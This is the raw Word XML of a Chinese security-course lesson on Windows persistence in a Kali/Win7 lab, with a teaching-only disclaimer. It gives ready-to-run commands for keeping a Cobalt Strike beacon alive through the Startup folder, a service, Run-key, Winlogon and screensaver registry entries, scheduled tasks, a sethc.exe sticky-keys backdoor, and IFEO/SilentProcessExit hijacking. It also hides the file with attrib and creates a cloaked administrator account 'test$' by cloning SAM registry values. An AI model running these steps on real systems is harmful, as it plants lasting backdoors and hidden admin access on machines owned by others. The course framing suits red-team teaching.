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免责声明： </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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本课程内容仅限于网络安全教学，不得用于其他用途。任何利用本课程内容从事违法犯罪活动的行为，都严重违背了该课程设计的初衷，且属于使用者的个人行为与讲师无关，讲师不为此承担任何法律责任。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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希望同学们知法、懂法、守法，做一个良好公民。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default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Windows权限维持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="4998" w:type="pct"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="CCCCCC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09"/>
        <w:gridCol w:w="3100"/>
        <w:gridCol w:w="2406"/>
      </w:tblGrid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804" w:type="pct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系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1799" w:type="pct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账号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="pct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04" w:type="pct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kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1799" w:type="pct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root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="pct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04" w:type="pct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win7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1799" w:type="pct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administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="pct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bidi w:val="0"/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123456</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0、准备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Python3传递CS生成的木马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939790" cy="2497455"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1905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97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对目标机上的木马解除安全锁定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939790" cy="7661910"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="5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661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1、自启动路径加载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将cs生成的木马，放到目录下后，等待目标机器关机重启上线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C:\Users\Administrator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.PC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\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup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Administrator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用户被重命名为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Administrator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.PC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）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939790" cy="1519555"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="27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19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重启输入密码后，等一会儿就上线了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939790" cy="1046480"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="28" name="图片 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46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2、自启动服务加载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sc create “ServiceTest” binpath= “cmd.exe /k C:\windows\temp\beacon.exe” depend= Tcpip obj= Localsystem start= auto 添加服务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sc delete ServiceTest 删除服务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将木马放到c盘临时文件夹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939790" cy="1679575"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12065"/>
            <wp:docPr id="11" name="图片 8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7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然后添加自启动服务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939790" cy="1494155"/>
            <wp:effectExtent l="0" t="0" r="3810" b="14605"/>
            <wp:docPr id="12" name="图片 11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94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重启输入密码后，等一会儿就上线了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939790" cy="862965"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5715"/>
            <wp:docPr id="9" name="图片 13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3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6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3、自启动注册表加载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REG ADD “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /V “backdoor” /t REG_SZ /F /D “C:\windows\temp\beacon.exe”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939790" cy="2133600"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="13" name="图片 16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6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重启输入密码后，等一会儿就上线了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939790" cy="744220"/>
            <wp:effectExtent l="0" t="0" r="3810" b="2540"/>
            <wp:docPr id="16" name="图片 18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8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4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4、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>定时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计划任务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打开任务计划程序，创建基本任务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939790" cy="3178175"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
            <wp:docPr id="7" name="图片 2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选择触发器，选择启动程序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5939790" cy="2804795"/>
            <wp:effectExtent l="0" t="0" r="3810" b="14605"/>
            <wp:docPr id="30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939790" cy="2305050"/>
            <wp:effectExtent l="0" t="0" r="3810" b="11430"/>
            <wp:docPr id="14" name="图片 23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3" descr="IMG_26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重启输入密码后，等一会儿就上线了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5、替换辅助功能程序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系统自带的辅助功能进行替换执行，放大镜，旁白，屏幕键盘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、粘滞键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等均可。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但这种方法需要修改权限才能使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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首先更改sethc.exe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（粘滞键）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程序的所有者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#一般的电脑连按五次shift会出现粘滞键提示。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5939790" cy="2424430"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13970"/>
            <wp:docPr id="3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939790" cy="3404870"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8890"/>
            <wp:docPr id="15" name="图片 28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8" descr="IMG_26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04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接着便可以编辑其权限，这里需要给予自己权限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939790" cy="3481070"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8890"/>
            <wp:docPr id="8" name="图片 31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1" descr="IMG_26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81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之后在windows下执行以下命令：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cd c:\windows\system32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move sethc.exe sethc.exe.bak //备份sethc.exe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copy cmd.exe sethc.exe //复制cmd.exe重命名为sethc.exe，也可以使用恶意后门文件来替代sethc.exe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939790" cy="2957195"/>
            <wp:effectExtent l="0" t="0" r="3810" b="14605"/>
            <wp:docPr id="10" name="图片 37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7" descr="IMG_26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7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最后连续按下5次”Shift”键，将弹出命令执行窗口（无需登录系统也可以执行）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939790" cy="4650105"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13335"/>
            <wp:docPr id="23" name="图片 40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0" descr="IMG_27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50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6、映像劫持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简单的说法，就是当你打开的是程序A，而运行的确是程序B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运行notepad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（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记事本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）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启动calc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（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计算器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）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REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe” /v debugger /t REG_SZ /d “C:\Windows\System32\cmd.exe /c calc”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939790" cy="3337560"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="24" name="图片 44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4" descr="IMG_27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配合GlobalFlag隐藏：程序A静默退出结束后，会执行程序B。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reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe” /v </w:t>
      </w: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</w:rPr>
        <w:t>GlobalFlag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/t REG_DWORD /d </w:t>
      </w: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</w:rPr>
        <w:t>512</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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#512 对notepad.exe开启调试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe” /v </w:t>
      </w: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</w:rPr>
        <w:t>ReportingMode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/t REG_DWORD /d </w:t>
      </w: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</w:rPr>
        <w:t>1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#0x1检测到进程静默退出时，将会启动监视器进程（即MonitorProcess的项值）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reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe” /v </w:t>
      </w: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</w:rPr>
        <w:t>MonitorProcess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/d “</w:t>
      </w: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</w:rPr>
        <w:t>C:\windows\temp\beacon.exe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”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或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reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe” /v </w:t>
      </w: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</w:rPr>
        <w:t>MonitorProcess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/d “</w:t>
      </w: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</w:rPr>
        <w:t>C:\windows\</w:t>
      </w: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system32</w:t>
      </w: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</w:rPr>
        <w:t>\</w:t>
      </w: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cmd</w:t>
      </w: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</w:rPr>
        <w:t>.exe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”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939790" cy="2658745"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
            <wp:docPr id="21" name="图片 50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0" descr="IMG_27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58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打开notepad后又关闭，等一会儿就上线了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（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靶场环境存在问题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）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7、WinLogon配合无文件落地上线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REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /V “Userinit” /t REG_SZ /F /D “C:\windows\temp\beacon.exe”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注销用户重新连接时上线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8、屏幕保护生效后执行后门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reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v SCRNSAVE.EXE /t REG_SZ /d “C:\windows\temp\beacon.exe” /f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等屏幕长时间不操作，进入保护状态的时候上线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9、隐藏后门木马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Attrib +s +a +h +r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beacon.exe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#隐藏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木马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Attrib -s -a -h -r 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beacon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.exe #恢复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木马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10、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号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建立一个用户名为”test$”，密码为”abc123!”的简单隐藏账户,并且把该隐藏账户提升为管理员权限。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net user test$ abc123! /add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net localgroup administrators test$ /add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939790" cy="3412490"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
            <wp:docPr id="22" name="图片 54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4" descr="IMG_27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12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CMD命令行使用”net user”,看不到”test$”这个账号，但在控制面板和本地用户和组是可以显示此用户的。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939790" cy="2310765"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5715"/>
            <wp:docPr id="19" name="图片 57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7" descr="IMG_27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10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5939790" cy="2408555"/>
            <wp:effectExtent l="0" t="0" r="381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彻底隐藏方法：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进入注册表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（regedit）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，需要到”HKEY_LOCAL_MACHINE\SAM\SAM”，单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击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右建权限，把名叫：administrator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的用户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组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给予：完全控制以及读取的权限，在后面打勾就行，然后关闭注册表编辑器，再次打开即可。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939790" cy="6706870"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13970"/>
            <wp:docPr id="26" name="图片 59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9" descr="IMG_27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06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来到注册表编辑器的”HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处，点击test$用户，得到在右边显示的键值中的”类型”一项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的</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>值，找到对应的目录。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939790" cy="3787140"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="25" name="图片 60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0" descr="IMG_27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87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找到administrator所对应的的项的值，并把其F值复制到test$用户的F值中保存。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939790" cy="3784600"/>
            <wp:effectExtent l="0" t="0" r="3810" b="10160"/>
            <wp:docPr id="17" name="图片 61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1" descr="IMG_27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8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分别把test$和对应值导出到桌面，删除test$用户 net user test$ /del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939790" cy="5217795"/>
            <wp:effectExtent l="0" t="0" r="3810" b="9525"/>
            <wp:docPr id="18" name="图片 62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2" descr="IMG_27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17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将刚才导出的两个后缀为.reg的注册表项导入注册表中</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left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此时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本地用户和组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及控制面板隐藏账号均不显示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5939790" cy="1789430"/>
            <wp:effectExtent l="0" t="0" r="381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5939790" cy="3019425"/>
            <wp:effectExtent l="0" t="0" r="381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但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通过kali的rdesktop 进行验证test$能成功登录</w:t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939790" cy="2619375"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1905"/>
            <wp:docPr id="20" name="图片 63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3" descr="IMG_27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cwMTc3Zjc2ZTUwNjRlMGYyNmQ2YmNkYTdmNDNkY2QifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="010435A8"/>
    <w:rsid w:val="01914632"/>
    <w:rsid w:val="02F327FE"/>
    <w:rsid w:val="0411346B"/>
    <w:rsid w:val="04745EB1"/>
    <w:rsid w:val="054D60FD"/>
    <w:rsid w:val="05635319"/>
    <w:rsid w:val="05AA2098"/>
    <w:rsid w:val="08AD1D28"/>
    <w:rsid w:val="090E134B"/>
    <w:rsid w:val="09793B73"/>
    <w:rsid w:val="098047A9"/>
    <w:rsid w:val="09C7321B"/>
    <w:rsid w:val="0B695340"/>
    <w:rsid w:val="0C822BB5"/>
    <w:rsid w:val="0CAC4597"/>
    <w:rsid w:val="0CAF4598"/>
    <w:rsid w:val="0CD50A5F"/>
    <w:rsid w:val="0D3229EB"/>
    <w:rsid w:val="0E1F0BBB"/>
    <w:rsid w:val="0FC55A86"/>
    <w:rsid w:val="0FEC62C8"/>
    <w:rsid w:val="10C93342"/>
    <w:rsid w:val="114A0E7B"/>
    <w:rsid w:val="11570F29"/>
    <w:rsid w:val="1221241B"/>
    <w:rsid w:val="1226513E"/>
    <w:rsid w:val="127E28E2"/>
    <w:rsid w:val="12CE1E35"/>
    <w:rsid w:val="131D0BBB"/>
    <w:rsid w:val="13352CE1"/>
    <w:rsid w:val="13983200"/>
    <w:rsid w:val="13A55A1C"/>
    <w:rsid w:val="13C627F3"/>
    <w:rsid w:val="13D440B7"/>
    <w:rsid w:val="13F118C1"/>
    <w:rsid w:val="150F7126"/>
    <w:rsid w:val="15460DEA"/>
    <w:rsid w:val="157D1577"/>
    <w:rsid w:val="15E424C2"/>
    <w:rsid w:val="161B72B9"/>
    <w:rsid w:val="167C0D2B"/>
    <w:rsid w:val="168E1415"/>
    <w:rsid w:val="1697343C"/>
    <w:rsid w:val="172B3BFE"/>
    <w:rsid w:val="18D92ADE"/>
    <w:rsid w:val="19192240"/>
    <w:rsid w:val="193D7C76"/>
    <w:rsid w:val="1A385A13"/>
    <w:rsid w:val="1AA40EE6"/>
    <w:rsid w:val="1B2B63C1"/>
    <w:rsid w:val="1BB51EC1"/>
    <w:rsid w:val="1BFF2486"/>
    <w:rsid w:val="1D2A3E2C"/>
    <w:rsid w:val="1D93101A"/>
    <w:rsid w:val="1D9E6340"/>
    <w:rsid w:val="1DE12B25"/>
    <w:rsid w:val="1EA71EAA"/>
    <w:rsid w:val="1F890B7E"/>
    <w:rsid w:val="1F9749F8"/>
    <w:rsid w:val="1FA27791"/>
    <w:rsid w:val="1FA96F10"/>
    <w:rsid w:val="205817EE"/>
    <w:rsid w:val="205A4E43"/>
    <w:rsid w:val="209669C5"/>
    <w:rsid w:val="2141740D"/>
    <w:rsid w:val="22E85DAF"/>
    <w:rsid w:val="237B2E3F"/>
    <w:rsid w:val="23DC40A3"/>
    <w:rsid w:val="24314289"/>
    <w:rsid w:val="24327D07"/>
    <w:rsid w:val="2437006A"/>
    <w:rsid w:val="24B46BCE"/>
    <w:rsid w:val="24C83C46"/>
    <w:rsid w:val="24D63974"/>
    <w:rsid w:val="25E87A4B"/>
    <w:rsid w:val="27CC71CA"/>
    <w:rsid w:val="283B39B4"/>
    <w:rsid w:val="290B6AC5"/>
    <w:rsid w:val="298700EC"/>
    <w:rsid w:val="2AA66B98"/>
    <w:rsid w:val="2ABD4734"/>
    <w:rsid w:val="2B6A6567"/>
    <w:rsid w:val="2B9601FE"/>
    <w:rsid w:val="2D0B272F"/>
    <w:rsid w:val="2D185BC2"/>
    <w:rsid w:val="2E283D2E"/>
    <w:rsid w:val="2F906DAB"/>
    <w:rsid w:val="2FAF1ED5"/>
    <w:rsid w:val="2FDD7BBA"/>
    <w:rsid w:val="2FDE0572"/>
    <w:rsid w:val="2FE74788"/>
    <w:rsid w:val="2FF8610C"/>
    <w:rsid w:val="304D32BE"/>
    <w:rsid w:val="30A03AB3"/>
    <w:rsid w:val="31AE191D"/>
    <w:rsid w:val="31EE3E4C"/>
    <w:rsid w:val="32B37CAB"/>
    <w:rsid w:val="32BB68B9"/>
    <w:rsid w:val="339316C7"/>
    <w:rsid w:val="33C72A37"/>
    <w:rsid w:val="353E6AC1"/>
    <w:rsid w:val="354543C0"/>
    <w:rsid w:val="35610116"/>
    <w:rsid w:val="366A298B"/>
    <w:rsid w:val="373A6B99"/>
    <w:rsid w:val="389B670D"/>
    <w:rsid w:val="393125BD"/>
    <w:rsid w:val="3AD538EB"/>
    <w:rsid w:val="3B0A5FE2"/>
    <w:rsid w:val="3BC30706"/>
    <w:rsid w:val="3CAD2526"/>
    <w:rsid w:val="3D504CF4"/>
    <w:rsid w:val="3E023612"/>
    <w:rsid w:val="3E520DC7"/>
    <w:rsid w:val="3F042A00"/>
    <w:rsid w:val="4027468A"/>
    <w:rsid w:val="409E2B5E"/>
    <w:rsid w:val="41580865"/>
    <w:rsid w:val="41A22321"/>
    <w:rsid w:val="42A94AFD"/>
    <w:rsid w:val="42F10AB2"/>
    <w:rsid w:val="43FD5D9C"/>
    <w:rsid w:val="43FF3554"/>
    <w:rsid w:val="442C6CCF"/>
    <w:rsid w:val="44654541"/>
    <w:rsid w:val="44E5710C"/>
    <w:rsid w:val="45C5024D"/>
    <w:rsid w:val="45D773FA"/>
    <w:rsid w:val="45F66EA4"/>
    <w:rsid w:val="467806FB"/>
    <w:rsid w:val="48B80A32"/>
    <w:rsid w:val="49E66385"/>
    <w:rsid w:val="4B351078"/>
    <w:rsid w:val="4B3F0AFB"/>
    <w:rsid w:val="4CC1510F"/>
    <w:rsid w:val="4CED2167"/>
    <w:rsid w:val="4CF32097"/>
    <w:rsid w:val="4E2B4BD8"/>
    <w:rsid w:val="4E2F38B6"/>
    <w:rsid w:val="4E3A790B"/>
    <w:rsid w:val="4EBF0626"/>
    <w:rsid w:val="4FF461D6"/>
    <w:rsid w:val="50014422"/>
    <w:rsid w:val="50886A42"/>
    <w:rsid w:val="51021475"/>
    <w:rsid w:val="51894076"/>
    <w:rsid w:val="52324416"/>
    <w:rsid w:val="536E572E"/>
    <w:rsid w:val="53A414A2"/>
    <w:rsid w:val="53D438C9"/>
    <w:rsid w:val="54401152"/>
    <w:rsid w:val="545A4CDB"/>
    <w:rsid w:val="5529786C"/>
    <w:rsid w:val="55EC4969"/>
    <w:rsid w:val="56282237"/>
    <w:rsid w:val="56690B07"/>
    <w:rsid w:val="5696214F"/>
    <w:rsid w:val="56C830BC"/>
    <w:rsid w:val="58B30533"/>
    <w:rsid w:val="59697EE0"/>
    <w:rsid w:val="5C816D6B"/>
    <w:rsid w:val="5CCC52A0"/>
    <w:rsid w:val="5D7B5F87"/>
    <w:rsid w:val="5DF97B7F"/>
    <w:rsid w:val="5E4D30F4"/>
    <w:rsid w:val="608F6263"/>
    <w:rsid w:val="6150643A"/>
    <w:rsid w:val="623B0DD0"/>
    <w:rsid w:val="62930806"/>
    <w:rsid w:val="62B334AF"/>
    <w:rsid w:val="634E3149"/>
    <w:rsid w:val="63D074B3"/>
    <w:rsid w:val="63E421C2"/>
    <w:rsid w:val="6635628F"/>
    <w:rsid w:val="66B73B69"/>
    <w:rsid w:val="67D3114F"/>
    <w:rsid w:val="67D623D7"/>
    <w:rsid w:val="6A366F42"/>
    <w:rsid w:val="6A986D85"/>
    <w:rsid w:val="6B99520C"/>
    <w:rsid w:val="6BDA6675"/>
    <w:rsid w:val="6C1E16E9"/>
    <w:rsid w:val="6CC647CC"/>
    <w:rsid w:val="6D1D2EAC"/>
    <w:rsid w:val="6D54535E"/>
    <w:rsid w:val="6DF7068A"/>
    <w:rsid w:val="6EB47D3A"/>
    <w:rsid w:val="6EB72172"/>
    <w:rsid w:val="717E7746"/>
    <w:rsid w:val="72B811C2"/>
    <w:rsid w:val="73504D4A"/>
    <w:rsid w:val="75371D1E"/>
    <w:rsid w:val="756E3325"/>
    <w:rsid w:val="759909EB"/>
    <w:rsid w:val="76305A1C"/>
    <w:rsid w:val="76961CD3"/>
    <w:rsid w:val="76DA5393"/>
    <w:rsid w:val="77412895"/>
    <w:rsid w:val="78064D32"/>
    <w:rsid w:val="78623905"/>
    <w:rsid w:val="79AE42E2"/>
    <w:rsid w:val="79B06CD4"/>
    <w:rsid w:val="7ABC2DEA"/>
    <w:rsid w:val="7AFA4C49"/>
    <w:rsid w:val="7B552996"/>
    <w:rsid w:val="7C0E1C6B"/>
    <w:rsid w:val="7C134586"/>
    <w:rsid w:val="7CDB270B"/>
    <w:rsid w:val="7DA34EC0"/>
    <w:rsid w:val="7DEA3E2D"/>
    <w:rsid w:val="7DFA4004"/>
    <w:rsid w:val="7E477671"/>
    <w:rsid w:val="7EE540FF"/>
    <w:rsid w:val="7F0D0245"/>
    <w:rsid w:val="7F58436E"/>
    <w:rsid w:val="7FFD493A"/>
    <w:rsid w:val="7FFF5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2"/>
    <w:autoRedefine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autoRedefine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autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="7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autoRedefine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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="10">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="8"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="11">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="8"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="标题 3 Char"/>
    <w:link w:val="4"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/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2023-09-21T06:13:00Z</dcterms:created>
  <dc:creator>X</dc:creator>
  <cp:lastModifiedBy>踏雪折梅</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-22T07:27:25Z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4F64CD81384A438E859B2E84C2553F51_12</vt:lpwstr>
  </property>
</Properties>
</file>